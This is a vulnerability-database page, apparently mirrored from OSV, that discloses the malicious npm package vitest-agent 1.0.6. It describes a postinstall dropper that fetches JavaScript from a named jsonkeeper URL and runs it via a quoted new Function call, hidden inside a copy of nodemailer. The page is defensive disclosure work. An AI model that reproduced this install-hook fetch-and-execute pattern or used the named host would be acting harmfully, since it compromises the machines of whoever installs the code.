npm

vitest-agent @1.0.6

Vulnerability report · Last retrieved from osv.dev July 1, 2026 at 10:05 PM UTC

Malicious

OSV ID

MAL-2026-6710

Ecosystem

npm

Summary

The package's postinstall script ( node lib/utils/index.js ) spawns a detached, stdio-suppressed Node child process that runs lib/utils/smtp-connection/index.js . That file fetches JavaScript from https://jsonkeeper.com/b/WDH3V via axios and executes the response with new Function("require", r.data.cookie)(require) , running unpinned, mutable, non-publisher code on the installer's machine at npm install time. The package is named vitest-agent but its main and shipped source are a verbatim copy of nodemailer (author field Andris Reinman , description is an unrelated React copyright string), a name/identity mismatch consistent with a lure targeting vitest ecosystem users. Concealment signals reinforce the dropper: a ~256 KB LICENSE file sits adjacent to a 185-byte dropper index.js under lib/utils/smtp-connection/ , and path names mirror legitimate nodemailer layout as cover. Because the harmful code path fires automatically from the postinstall lifecycle hook, installers are compromised without any explicit user action beyond installing the package.

Source: amazon-inspector (6e0165cbb3d6ed37a96889c4b016463706346e1c09413635c31ea1ceedde8774)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.